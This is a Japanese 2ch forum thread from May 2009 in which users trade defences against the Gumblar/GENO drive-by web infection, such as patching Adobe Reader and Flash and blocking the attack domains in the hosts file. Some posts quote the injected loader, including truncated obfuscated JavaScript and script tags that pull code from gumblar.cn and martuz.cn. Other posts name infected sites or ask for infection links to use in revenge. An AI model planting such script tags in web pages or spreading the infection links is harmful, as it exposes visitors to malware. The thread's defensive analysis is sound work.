09/05/17 14:58:26 ov4CW62y0
>>203
Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正したver
以降は別物の脆弱性ver
208:192.168.0.774
09/05/17 14:58:50 MpyKmePW0
>>204
タスクマネージャいけるなら
新しいタスクの実行→explorer
でタスクバーとか出るんじゃね
209:192.168.0.774
09/05/17 14:59:32 ilxyL7Fy0
>>200
提出済みです。
210:192.168.0.774
09/05/17 14:59:44 YpVuMiqJ0
>>202
それは結構前から言われてる事、本当かどうかは知らん
211:192.168.0.774
09/05/17 15:00:06 6zykGUMd0
>>198
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
12799 個のドメインを感染させています。
(function(){var IlkQ='%';var xTy7='var>20a>3d>22Sc>72iptE>
6egine>22>2cb>3d>22V>65rsion()+>22>2cj>3d・・・・・・
212:192.168.0.774
09/05/17 15:01:05 ybsV4IQS0
ファイアフォックス使ってんだけど
弾いてくれたから大丈夫って感じなの?
213:192.168.0.774
09/05/17 15:01:34 Z6bHwWLb0
>>193と同じく、Adobe ReaderとFlash Playerを最新にして
Adobe ReaderのJavascriptは切っておいた。
あと今プニル使ってるので
念のためプニルの設定とIEのインターネットオプションの両方で
Javascript無効にしてる。
ただ、IEのJavascriptは実際のところどうなんだろう。
2ch専ブラにまで影響出るので、正直言うと情報収集に少々厄介なんだが。
214:192.168.0.774
09/05/17 15:01:45 7TaPV4fL0
そういや、3週間前にFirefoxやJane Styleのログが
PCシャットダウン→起動後に全飛びしたけど、
このウイルスとは関係ないよね。
215:192.168.0.774
09/05/17 15:02:35 QQBuyEr/0
ブラウザのJavascriptを切るってどうやればいいの?
216:192.168.0.774
09/05/17 15:02:39 DKlwM8ZhP
>>207
以前じゃなくて以降なのか?
217:192.168.0.774
09/05/17 15:02:47 7TaPV4fL0
テンプレに書かれている症状は一切ないし、大丈夫だと思いたい。
218:192.168.0.774
09/05/17 15:03:21 ov4CW62y0
>>216
ごめん、以降は別の脆弱性修正ver
219:192.168.0.774
09/05/17 15:04:09 ilxyL7Fy0
検出可否スレより最新情報を転記
最新の落とされてくる本体ファイルの検出結果。こんな状況なので、セキュリティベンダーの対応を待って
除去してもらおうとか考えるよりも、感染が疑われる(HPを更新したPCとか、踏んじゃった人とか)は
PCリカバリ(OS再インストール)以外の解決策は推奨できないようです。
martuz_cn_id2_20090517.pdf
MD5 :3cdbaee0c533809e43c6b815884763ff
URLリンク(www.virustotal.com) (2/40)
martuz_cn_id10_20090517.exe
MD5 :b0ca69853b371ec9eb58829e869f6f10
URLリンク(www.virustotal.com) (3/40)
220:192.168.0.774
09/05/17 15:06:25 2kKhzap+0
>>218
もちつけ
221:192.168.0.774
09/05/17 15:06:50 HpOylDYR0
USBメモリでも感染る?
222:192.168.0.774
09/05/17 15:07:36 OUF99NvG0
>>207
サンクス
ということは3月のアップデートをきっちりしておけば
こいつに関してはとりあえずOKということだね
223:192.168.0.774
09/05/17 15:07:41 DKlwM8ZhP
>>218
そういう意味か
脆弱性復活したのかと思ったw
224:212
09/05/17 15:07:54 ybsV4IQS0
ちょwww誰か教えてくださいwww
このままじゃトイレにもいけねぇ
225:192.168.0.774
09/05/17 15:09:26 +t63J1Bn0
本スレ見てきたんだが、なんかもうGENO付きURL配布とかしてるし
感染は拡大する一方だな
俺なりにまとめてみた
URLリンク(geocities.com)
追加あったら気軽に書いてくれ
226:192.168.0.774
09/05/17 15:10:34 7yrlZLjk0
>>224
かけちゃえかけちゃえ
227:192.168.0.774
09/05/17 15:10:37 yV8RyIy+0
>>185
ubuntsかなにかのLive CDは用意できないのか?
感染状態でexplorer起動しても、右クリックのコンテキストメニューが
使えないはずだからPC単体ではもはや復帰できないと思う。
あるいはもう一台HDDがあれば、感染したHDDを抜いて、別HDDに
OSをインストールすれば復旧の方法はある
228:192.168.0.774
09/05/17 15:10:57 xLw+W3X80
>>219
検出できるベンダーもバラバラだしウイルスの詳細知らずに結果だけ見たら誤検出?ってレベルじゃないか・・・
229:192.168.0.774
09/05/17 15:11:55 BvZF1aRY0
最新版に更新しても新種が出るかもしれないから安心できないお……
だからadobe削除したお!
230:192.168.0.774
09/05/17 15:12:17 NtSEuLT8Q
感染サイトのURL貼ってる奴、マジで氏ねよ。
231:212
09/05/17 15:12:25 ybsV4IQS0
┃
┃ ____
┃/⌒ ⌒ \
┃ (―) (―) \
┃⌒(__人__)⌒ |
┃ |
┃ /
┃ヽ  ̄/
┃ \ ,;∴~;゚,。
┃ ヽ_)つ'∴・゚゚。∴.;
┃ (::)(::) ヽ ~;゚
┃ / 〉 ) >>226
┃ (___)
232:185
09/05/17 15:16:45 YGxJUpFP0
>>206
WinXPSP3って機種名ではないのでしょうか?
メーカーはマウスです
>>208
ありがとうございます!バー出ました
只今、先生に相談しながらクリーンインストールに挑戦中です
233:192.168.0.774
09/05/17 15:17:56 6zykGUMd0
URLリンク(www3.atword.jp)?とおもったら/
234:192.168.0.774
09/05/17 15:19:02 BSZ5z9KU0
Adobe Readerは9.1.1が最新型じゃないの?
235:192.168.0.774
09/05/17 15:19:05 +Enx2Z7OP
クリーンインストールって面倒なん?
236:192.168.0.774
09/05/17 15:22:35 zPBL8LWuO
>>235
時間かかるし
データも真っ白になるよ
237:192.168.0.774
09/05/17 15:22:38 2KRNOGSH0
>>225
良く分からないけど、それ、誰でも書き込みできるようになってんの?
なってるなら、感染サイトへのリンク張るヤツ出てくるから、
他のヤツに権限を与えない方がよいよ。
そのあたりは大丈夫だと思うけど。
238:192.168.0.774
09/05/17 15:24:42 7TaPV4fL0
AdobeのFlashとReaderを最新にしていたら
感染サイトを踏んでも大丈夫という情報を広めてきます。
239:192.168.0.774
09/05/17 15:29:08 /4yp3BhL0
2ちゃんの専ブラはだいじょうぶなんかねぇ。
オレJaneDoeViewだけど情報収集はここしかわからんのが困るわw
240:192.168.0.774
09/05/17 15:30:27 7TaPV4fL0
URLは極力踏まないようにすればいいよ
241:192.168.0.774
09/05/17 15:30:42 gvZ9d8TtP
ソフ板も見るといいよ
242:192.168.0.774
09/05/17 15:31:20 rsI8zkAT0
>>239
専ブラは平気
243:192.168.0.774
09/05/17 15:32:26 Dx3JCXno0
>>241
URLを張っていただくとありがたい
244:192.168.0.774
09/05/17 15:33:07 Z6bHwWLb0
>>242
IEコンポーネントでも?
245:192.168.0.774
09/05/17 15:33:15 gvZ9d8TtP
ソフトウェア
URLリンク(pc12.2ch.net)
普通ここまでしない
246:192.168.0.774
09/05/17 15:34:25 1tk6kEt+0
しかし、Adobe Readerはわざと常駐を切らない限り、Adobe Updaterが
更新を知らせてくれるけど、Flashはヤバいね。
大手サイトでフラッシュ使ってるところは要求バージョンを常に最新に
してほしいもんだ。
247:192.168.0.774
09/05/17 15:35:11 Dx3JCXno0
>>245
ありです
248:192.168.0.774
09/05/17 15:35:31 7TaPV4fL0
そりゃないよ
249:192.168.0.774
09/05/17 15:37:28 vH8KoEBz0
>>237見てまともなリンク先かと思って225踏んじまったじゃねーかw
250:192.168.0.774
09/05/17 15:43:52 7yrlZLjk0
>>246
むしろフラッシュを使わないで欲しい
251:192.168.0.774
09/05/17 15:48:45 7TaPV4fL0
うぉっかないなぁ
252:192.168.0.774
09/05/17 15:49:21 6zykGUMd0
アクセス制限中です。しばらく経ってからアクセスしてください。
※ 現在、大規模な攻撃を受けており、このシステムを導入しています。
ご迷惑をかけてすいません。 (o*。_。)oペコッ
チェッカー ><
253:192.168.0.774
09/05/17 15:59:54 MP/sWvjo0
GENOウイルスチェッカー
今入ってるけど まさか俺のせいじゃないよね。
254:192.168.0.774
09/05/17 16:00:53 ilxyL7Fy0
>>219
exeの方を、Normanのサンドボックスに投げ込んだ結果の回答をコピペ
前は34.exeとu.batだったのがファイル名変わってるなぁ。
[ DetectionInfo ]
* Filename: C:\analyzer\scan\martuz_cn_id10_20090517.exe.
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS.
* Compressed: YES.
* TLS hooks: YES.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.
[ General information ]
* Decompressing UPX3.
* File length: 15872 bytes.
* MD5 hash: b0ca69853b371ec9eb58829e869f6f10.
[ Changes to filesystem ]
* Creates file C:\_.e.
* Deletes file c:\sample.exe.
* Creates file C:\e.bat.
* Deletes file "c:\_.e" .
* Deletes file "c:\e.bat".
[ Changes to registry ]
* Accesses Registry key "HKLM\SoFtWARE\Microsoft\Windows nT\currentversion\Drivers32".
[ Process/window information ]
* Creates process "CMD.EXE".
[ Signature Scanning ]
* c:\sample.exe (15872 bytes) : no signature detection.
* C:\_.e (15872 bytes) : no signature detection.
255:192.168.0.774
09/05/17 16:02:33 MDg7JZzS0
ウィルスバスターは何してるの?
256:192.168.0.774
09/05/17 16:05:39 VMAXjN900
お前らウイルスセキュリティ馬鹿にしてるけどいい加減にしろよ?
2ちゃんの連帯感みたいなの感じちゃって調子に乗ってるんだろ?
正直、 うざいから死んでwww(爆藁
信者とか妄想してる暇があったら親孝行しろw糞ww
どうせリアルじゃペコペコしてんだろw
ウイルスセキュリティ以下の人間だよね?
君たちww
妄想と批判しか出来ない哀れな奴らw
ウイルスセキュリティ叩いてどうなる?
お前らマヂ頭使えw
257:192.168.0.774
09/05/17 16:06:51 ovH4yFdR0
>>255
更新キターって聞いたけど自分のところでは黙ったままだ
258:192.168.0.774
09/05/17 16:07:03 MDg7JZzS0
ウィルスバスターいれてるんだけど役に立たないの?
対応してくれないの?
259:192.168.0.774
09/05/17 16:08:37 61lOiijw0
pdf見るのにFoxitReader使ってて、AdobeReaderはインスコしてないんだが、
これってFoxitReader経由でも感染するのか?
260:192.168.0.774
09/05/17 16:09:40 F5MPX4G50
>>246
それはいいね、前回のGENO騒動までアップデートを全くしてなかったから危なかった
261:192.168.0.774
09/05/17 16:12:35 MP/sWvjo0
>>257
俺のノートンもライブアップデートが沈黙してた。
仕方ないので手作業で定義ファイル落としてきた。あくまでもノートンの話。
xxxp://www.omora.pink-no1.net/の入った先menu/menu1.htmlが
危険度200%
かなり危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
これ危ないのかな?
262:blocktxt
09/05/17 16:18:29 6zykGUMd0
前のうpろだ理由は分からないけど削除されたみたいなんで
こっちに上げておきます。
URLリンク(uproda.2ch-library.com)
263:192.168.0.774
09/05/17 16:18:48 KdAQNY9c0
テメーのサイト見たらウィルスに感染したぞゴルァ路線はどうだろう
264:192.168.0.774
09/05/17 16:19:19 1tk6kEt+0
>>261
ここにはGenoいないっぽいけどな。
リンク先に潜んでるんだろうか。
265:192.168.0.774
09/05/17 16:22:29 MP/sWvjo0
>>264
㌧。一応入らないにしとく。
266:192.168.0.774
09/05/17 16:22:31 Grc1h74N0
脅威だな
救急車依頼の恐怖を感じてるんだけど
267:192.168.0.774
09/05/17 16:23:07 oRKg9iVz0
>>266
どんだけ大昔のだよww
268:192.168.0.774
09/05/17 16:29:20 MDg7JZzS0
ウイルスバスターはなにしてるの?
なにもしないの?
269:192.168.0.774
09/05/17 16:30:53 f7PXip0E0
GENOウイルス対策
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 zlkon.lv
127.0.0.1 gumlar.cn
127.0.0.1 martuz.cn
↑これをちょっと説明して頂けませんか?
270:192.168.0.774
09/05/17 16:33:10 7TaPV4fL0
zlkon.lv
gumlar.cn
martuz.cn
に飛ぼうとすると127.0.0.1に飛ぶってことです。
要するに本来のIPに飛ぼうとするのを防止します。
271:192.168.0.774
09/05/17 16:36:06 CuLRuFv70
>>269
右側のzlkon.lvとかにアクセスしようとする
↓
hostsの内部処理で127.0.0.1に読み替えてそこにアクセスする
↓
127.0.0.1は自分自身なので本当のzlkon.lvのIPアドレスにはアクセスしない
↓
安全
272:192.168.0.774
09/05/17 16:36:26 MDg7JZzS0
ウィルスバスターな何やってるんだよ
早くしてくれよ
感染してるかもしれないのに
273:192.168.0.774
09/05/17 16:36:46 0CtfCDPI0
>>186
これも martuz.cn に飛ばすんだな
<script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>
martuz.cnにアク禁くらわせるだけでかなり防げそうだな、こりゃ
274:192.168.0.774
09/05/17 16:37:45 7UVnacRX0
www■laqoo.net■kyouun■pet■index.html
でavast先生がredirector H8検知した。
侵入前にブロックできたって認識でいいのかなぁ。
おかしな挙動は見られないが
275:192.168.0.774
09/05/17 16:40:59 uRUXabUv0
>>269
初期の頃は直接IPが記述してあって、感染中に.exeをダウンロードする為そこに繋ごうとしていた。
ウィルス対策ソフトでそのIPがBANされつつある中、zlkon.lvとかgumlar.cnとか適当なドメイン名を経由して.exeのダウンロードを行おうとする手段が登場
ソフトの対策遅れでまだその経由した方からは繋がっちゃったりが有るんで、
windows標準の "ホスト名>IPの変換を手動で上書きする" 方法によってzlkon.lvやgumlar.cnに繋がないようにする
276:192.168.0.774
09/05/17 16:41:05 0CtfCDPI0
>>198
gumblar.cn にご案内~
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
277:192.168.0.774
09/05/17 16:42:04 W3Qz58cJ0
>>262
落としたいけど元々住人じゃないんでパスが判らんです
GENOじゃないですよね?
278:192.168.0.774
09/05/17 16:45:11 f7PXip0E0
>>270
ありがとうございます
127.0.0.1がマシン自体を表すアドレスってことは、今調べて分かったのですが
firefoxのAdblock Plusのフィルタリストに「zlkon.lv」「gumlar.cn」「martuz.cn 」
を入れても阻止できるんでしょうか?
279:192.168.0.774
09/05/17 16:48:13 f7PXip0E0
>>271
リロードし忘れたorz
分かりやすい説明ありがとうございます
280:192.168.0.774
09/05/17 16:49:30 6zykGUMd0
>>274
(function(rzm){var x34p='%';eval(unescape(
('v.61r.20a.3d.22.53cript.45ng.69ne.22.2cb.3d.22Version()+・・・・・・
URLリンク(www.virustotal.com)
281:192.168.0.774
09/05/17 16:51:53 0CtfCDPI0
>>264 いないよね。でもこんなスクリプトの化け物みたいなページにはブラウザでアクセスしたくないわw
282:192.168.0.774
09/05/17 16:54:08 61lOiijw0
ググったけどAdobeReaderインストールしてなくてFoxit使っててもヤバいのね・・・
Foxitも環境設定でJavaScript切らないと駄目か
283:192.168.0.774
09/05/17 16:55:23 6zykGUMd0
>>264
無し
284:192.168.0.774
09/05/17 17:01:44 7UVnacRX0
>>280
本件まんまですなぁ(´-`)
なんでペットの名前サイトなんかがやられてんだよw
恐ろしくてWEB周れないじゃんこれ
285:192.168.0.774
09/05/17 17:01:54 0CtfCDPI0
>>274
gumblar.cn ご案内コース
<script src=//gumblar.cn/rss/?id="+j+"><\/script>
286:192.168.0.774
09/05/17 17:02:08 LQE1Ao+t0
>>282 俺も使ってる それ気になるな。
287:192.168.0.774
09/05/17 17:11:33 gLr/8LT/0
hostsファイルに以下の行を追加というのは
上と同じように#の中に入れればいいのでしょうか
288:192.168.0.774
09/05/17 17:12:13 MP/sWvjo0
>>264>>281>>283 お手数お掛けしました。
~かなり判定厳しめに設定してあります。~
あっちを立てるとコッチが立たず な感じみたいですね。
289:192.168.0.774
09/05/17 17:13:54 CuLRuFv70
>>287
#はその行を無効にする(コメント扱いにする)から不要
127.0.0.0 localhost
というのが普通は最初に入ってるはずだからそれと同じ書き方
290:192.168.0.774
09/05/17 17:14:57 1tk6kEt+0
>>287
先頭に#があるのはコメント行。
#なしで行追加。
291:192.168.0.774
09/05/17 17:16:51 1tk6kEt+0
>>289
なぜか数ヶ月前にWindows Defenderがlocalhostの記述行を削除したよ。
292:192.168.0.774
09/05/17 17:19:00 q8u6cZFi0
やっぱここが一番建設的なスレだな
293:192.168.0.774
09/05/17 17:22:25 gLr/8LT/0
>>289-290
ありがとうございました
294:192.168.0.774
09/05/17 17:23:07 f7PXip0E0
>>278誰か分かりませんでしょうか?
295:192.168.0.774
09/05/17 17:25:09 1tk6kEt+0
>>294
たぶん大丈夫だと思うけど、hosts書きかえちゃった方がより確実。
296:192.168.0.774
09/05/17 17:28:02 0CtfCDPI0
>>294
adblockがどんなもんかは知らんけど、firefoxしか使わないんなら大丈夫なんじゃね?
ただサイトはこれからもどんどん増えるので、この3つさえ入れときゃ明日も安心ってわけじゃないんだけどね
adobeを最新にして全てを忘れるのが一番幸せかも試練
297:192.168.0.774
09/05/17 17:30:02 f7PXip0E0
>>295-296
ありがとうございます、気を付けます
298:192.168.0.774
09/05/17 17:32:19 6zykGUMd0
Spybot - Search & Destroy もhosts書き換えますね
299:192.168.0.774
09/05/17 17:39:49 7TaPV4fL0
はい。
300:192.168.0.774
09/05/17 17:49:24 6zykGUMd0
martuz.cnノートンが対応
URLリンク(safeweb.norton.com)
301:192.168.0.774
09/05/17 17:49:53 7TaPV4fL0
ノートンGJ
302:192.168.0.774
09/05/17 17:58:11 Grc1h74N0
やべえノートンに乗り換えるときがきたかも
303:192.168.0.774
09/05/17 18:01:36 mIA3fiU30
>>300
おお
304:192.168.0.774
09/05/17 18:05:57 O4C38sHjP
今北用ってもう誰か作ってる?
無いなら作るけど
305:192.168.0.774
09/05/17 18:24:33 1tk6kEt+0
>>300
その一方でgumlar.cnは安全。
URLリンク(safeweb.norton.com)
gumlar.cnは実際にもう動作停止状態なのかな?
306:192.168.0.774
09/05/17 18:24:59 Pub4l/uF0
zlkon.lvとgumlar.cnは本当にこのドメインなのか?
SCFに遮断させたら、martuz.cnはおkらしいが、↑二つは「DNSで解決されていません追加しますか?」
だとよ。
307:192.168.0.774
09/05/17 18:25:21 QPPdxGJ80
昨日このウイルスを知って不安だったので書き込みします
【OS】
XP
【使用セキュリティソフト】
avast
【疑った理由】
ニコニコの動画を見る際に『JavaScriptが無効になってます』といったような文字が出て
最新のフラッシュプレイヤーを入れてくださいとの表記が出た。
【症状】
PCがとても重いときがあり、MWPで曲を聴いてたのが音飛びが酷くなり
フリーズ直前までいったこともあった(作業中ではあったが・・・)
【確認手段】
cmd.exe、regedit.exeは使用可能
sqlsodbc.chmのサイズ確認
【結果】
フラッシュプレイヤーを最新にして以降ニコニコは見れるようになった
今のところ怪しげなパケットはなさそうだが不安
308:192.168.0.774
09/05/17 18:28:15 /SoDyIML0
>>300
js切ってても見れるようにしとけよ
309:192.168.0.774
09/05/17 18:28:42 6zykGUMd0
>>305
ほんとだ???
310:192.168.0.774
09/05/17 18:28:53 Pl/Rjd540
>307
報告御苦労
311:192.168.0.774
09/05/17 18:28:59 f7PXip0E0
GENOウイルス対策
■adobe flashplayerを最新版に更新
Adobe Flash PlayerとShockwave Flashって同じものですか?
312:192.168.0.774
09/05/17 18:30:14 Pub4l/uF0
>>311
違う。
313:192.168.0.774
09/05/17 18:32:32 kVP/8H1t0
>>307
それ原因は別だから安心しなさい。
314:192.168.0.774
09/05/17 18:32:51 1tk6kEt+0
>>306
すまん。おれがb抜いちゃってるわw
gumlar.cnでなくgumblar.cnね。
315:192.168.0.774
09/05/17 18:33:56 6zykGUMd0
5/15 21:00ごろにgumblar.cnのAレコードの登録がなくなりました。
Aレコードがなくなりましたのでとりあえずgumblar.cnは意味がなくなりました。ただ、
レジストラによる対策ではない?ようなので
再度Aレコードが登録される可能性があるので、引き続き注意は必要です。
これか?
URLリンク(jvnrss.ise.chuo-u.ac.jp)
316:192.168.0.774
09/05/17 18:34:11 f7PXip0E0
>>312
んじゃあShockwave Flashってのは最新版に更新しなくてもいいんですよね?
更新のしかた分からないけどw
317:192.168.0.774
09/05/17 18:34:48 jSw80LZp0
>>314
何で抜くんだよ
まさか手打ちなのか?普通コピーだろ
318:192.168.0.774
09/05/17 18:38:45 1tk6kEt+0
>>317
悪かったよぉ。>>269をコピペしちゃったんだよぉ。
319:192.168.0.774
09/05/17 18:39:36 kVP/8H1t0
手打ち職人の朝は早い。
320:192.168.0.774
09/05/17 18:39:49 4DIp3Q850
おい殺すぞ
>>225踏んでサブPC動かなくなった
殺人予告
>>225魔自己rろす
321:192.168.0.774
09/05/17 18:41:13 7TaPV4fL0
もしかして今GENOウイルスまとめサイト重い?
322:192.168.0.774
09/05/17 18:41:36 FkoNww+u0
>>318
今確認してきたら、GENOウィルスチェッカーのhostsファイルもgumlarになっとった。
323:192.168.0.774
09/05/17 18:42:05 Pub4l/uF0
gumblar.cnにしても同じだ。
zlkon.lvも
324:192.168.0.774
09/05/17 18:42:23 7TaPV4fL0
>>317,318
てことはここのも間違えている悪寒w
ここのサイトの人もしみてたら修正求む
URLリンク(geno.2ch.tc)
325:192.168.0.774
09/05/17 18:43:56 4DIp3Q850
頼む('A`)
誰か地獄少女にアクセスしたんだが404だ
代わりにGEOウィルスで復讐したいんでURLくれー('A')
326:192.168.0.774
09/05/17 18:45:08 1tk6kEt+0
>>323
有効なAレコードを消しちゃってる状態だから名前解決できないんでしょ。
327:192.168.0.774
09/05/17 18:47:09 QPPdxGJ80
>>313
もしよろしければ詳しく教えていただけないでしょうか?
328:192.168.0.774
09/05/17 18:49:30 kVP/8H1t0
NGID 4DIp3Q850 、と。よしスッキリ。
329:192.168.0.774
09/05/17 18:50:18 Pub4l/uF0
詳しくないけど、どちらも逆引き出来ないね。
URLリンク(safeweb.norton.com)
で評価が出ることと、DNSが有効化は別問題?
330:192.168.0.774
09/05/17 18:52:45 1PB83W/v0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
331:192.168.0.774
09/05/17 18:53:17 E5NPdo1R0
>>316
Shockwave player と Flash playerは別物。
ごっちゃにせず、目を見開いてよく読むこと。
332:192.168.0.774
09/05/17 18:53:35 1tk6kEt+0
>>329
評価した段階ではAレコード有効だったんだと思う。
で、Nortonの評価がグリーンになったところで再度アクティブに
なるかもしれん。
333:192.168.0.774
09/05/17 18:53:45 Dx3JCXno0
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ('A`) ? ? ? ? なんだか無償にコピペしたくなる
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? なのに初心者にはコピペできない
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ?
334:192.168.0.774
09/05/17 18:56:04 Pub4l/uF0
つまりキャッシュ情報表示してたのね。
Nortonのは今日初めて使ったが、意味ないサービスだな
335:192.168.0.774
09/05/17 18:57:24 +UWQkKTW0
まとめサイトが感染したってマジ?
336:192.168.0.774
09/05/17 19:00:24 PGm7MFXg0
>>335
ソースはお前の頭ん中か?
337:192.168.0.774
09/05/17 19:02:16 f7PXip0E0
>>331
どっちもwikiで調べようとすると「Adobe Flash」ってページがでるから
同じ物なのかと思いましてw
adobe flashplayerだけ最新版にしとけばOKってことですよね?
338:192.168.0.774
09/05/17 19:02:19 +UWQkKTW0
>>336
いや、人づてに聞いただけ
事実じゃないならそれでいい
339:192.168.0.774
09/05/17 19:09:37 Rr9xCLR70
>>244
通常使うブラウザは火狐にしとけ。
340:192.168.0.774
09/05/17 19:10:00 DAUhxtRJ0
441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
341:192.168.0.774
09/05/17 19:12:00 pC5ZVjuD0
Warning: fopen() [function.fopen]: Unable to access log/2009516.dat in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
Warning: fopen(log/2009516.dat) [function.fopen]: failed to open stream: No such file or directory in /virtual/owata-net/public_html/owata-net.com/index.php on line 123
毎日チェックしてるサイトでこんなの表示されたけど意味がわからない。
Warning:とか出てるから気味悪いけどgenoと関係ないよね?
セキュ板にも貼ったけど荒れててダメっぽい!
342:192.168.0.774
09/05/17 19:14:49 7TaPV4fL0
チェッカーに通してみて
343:192.168.0.774
09/05/17 19:15:38 aydvb1+C0
「便所の落書き」「痰ツボ」と罵倒されてきた2ちゃんねるがGENOウィルス騒動の解決に
一番大きく貢献するまで、あと五日。
(「その時歴史が動いた」 2078年5月放送予定)
344:192.168.0.774
09/05/17 19:16:15 kuRpimDu0
>340
コピペにこんなこと言うのもなんだが
×総合ホビー展示即売会「ビコン」
○総合ホビー展示即売会「ホビコン」
ホビーコンプレックスの略でホビコンね。
345:192.168.0.774
09/05/17 19:18:44 6zykGUMd0
★11荒れすぎ w
346:192.168.0.774
09/05/17 19:20:41 4g69K7//0
★1~2スレあたりはセキュ板とν速がほとんどだったからね
同人・VIPから流れてきてひどいことになった
347:192.168.0.774
09/05/17 19:21:07 qd90in+R0
荒れてるか?
あれくらい大したことないと思うけど
348:192.168.0.774
09/05/17 19:26:28 NUScdqsg0
Chromeも対象になったのが出たとかニュー即で言われたり
背景黒いほうのwikiの「感染したと~」とアドレスがおかしいとかセキュ板で言われたり
またなんかいろいろ来たらしいけど結局どうなってんのこれ
349:192.168.0.774
09/05/17 19:28:52 OKDvuiXi0
IDも出ないセキュ板の情報なんて信用出来んわ
自演し放題だし
350:192.168.0.774
09/05/17 19:29:20 MP/sWvjo0
何か一行だけになっちゃったよチェッカーのところ。
■hostsファイル書き換え
hostsファイルに以下の行を追加
127.0.0.1 martuz.cn
ひょっとしてgumblar.cn zlkon.lv要らないの?
127.0.0.1 zlkon.lv
127.0.0.1 gumblar.cn
127.0.0.1 martuz.cn
351:192.168.0.774
09/05/17 19:30:07 qTLKsZ5C0
見れない=感染じゃなくて
ただの集中でアクセスできないだけでしょ
352:192.168.0.774
09/05/17 19:30:13 q9beek69O
セキュリティ板 GENOスレ11の9で紹介されていた、
ポート135, 445を閉じたらネットに繋げなくなった。
元に戻そうにもプロパティが表示されない。
デバイスマネージャーやサービスの画面を閉じようとすると
プロパティを閉じろと言われるけど、Alt+Tabで探しても見つからない。
それにコンパネの右半分が真っ白。データフォルダの方は正常に表示されるのに。
誰か助けてください。
353:192.168.0.774
09/05/17 19:32:01 6zykGUMd0
>>350
まだ安心できない
354:192.168.0.774
09/05/17 19:33:43 OKDvuiXi0
ESCなりALT+F4なりで全部終了させて再起動したのかね
右半分が真っ白とか一時的な描画異常なんて誰でも経験する事で
再起動すればまず直る
再起動しても同じというならシラネ
355:192.168.0.774
09/05/17 19:34:19 MP/sWvjo0
>>353
いや、漏れて来るのは解ってるんだけど・・・。
私のトリップは◆XcxlmnqGqUです←―この人何処にいるのかしら。
356:192.168.0.774
09/05/17 19:34:38 4g69K7//0
hxxp://skyhighpremium■com
ここもかな。チェッカーでは1000%とでた
アクセスしたくないし、ソースチェッカー規制くらってる
357:192.168.0.774
09/05/17 19:35:22 DAUhxtRJ0
>>344
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ホビコン」【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
358:192.168.0.774
09/05/17 19:45:27 0KCBdJWL0
612 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:43:11 ID:I820zXBQ0
スレリンク(software板:611番)
611 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/17(日) 19:30:30 ID:/KeDK9cs0
noscriptの「ブックマークから開いたサイトを許可する」って
履歴とブックマークの管理のウィンドウの履歴から開いても適用されるんだな
www.seibidoshuppan.co.jpここを開き直そうとしたらFlashが再生されたからうんこ漏らしたぜ・・・
martuz.cnを弾いてくれたから事なきだったけど
一応気になったからコピペ
そもそも「ブックマークから開いたサイトを許可する」はチェック入れるべきじゃないと思うけど
359:352
09/05/17 19:48:32 q9beek69O
>>354
それが再起動しても直らんのです。
書き忘れましたがOSは2kです。
携帯じゃ対応策調べようにもままならず…
些細なことでもいいんで、心当たりあれば教えてください。
360:192.168.0.774
09/05/17 19:50:13 7TaPV4fL0
>>358
サンキュー
361:192.168.0.774
09/05/17 19:51:58 4g69K7//0
>>358
^w^;
362:192.168.0.774
09/05/17 19:57:17 OKDvuiXi0
>>359
今内容見てきたがRemote Procedure Call停止って普通しないんじゃね?
そもそもあの内容が正しいかどうかも分からんから試す気にもならん
ただ135/445を閉じた方がいいのは事実なので自分はルータ側で閉じている
(と言うよりデフォルトで閉じられてたが)
元々あちらの板はID出ないし情報信用出来ないよ、見る価値無い
363:192.168.0.774
09/05/17 20:13:01 MpyKmePW0 BE:660438427-2BP(0)
なんだかいろいろご迷惑をおかけしております
>まとめ(黒)が見れない
急激にアクセス増えたので鯖が死にそうになってるみたいです
15時からの5時間でリファラーが2000件以上増えました
>メニューのリンクがおかしい
修正しました
364:192.168.0.774
09/05/17 20:17:00 4g69K7//0
>>188
AVG Anti-Virus Version 86
スレリンク(sec板:3番)
Q5. 2chのログにウィルスが検出されたんですけど
A5. ログに貼られたコードだけではPC内で感染行動をおこすことはできないので無害です。
AVG User Interface → ツール → 高度な設定 → 常駐シールド → 例外 に
ログフォルダを追加することで回避できます。
365:352
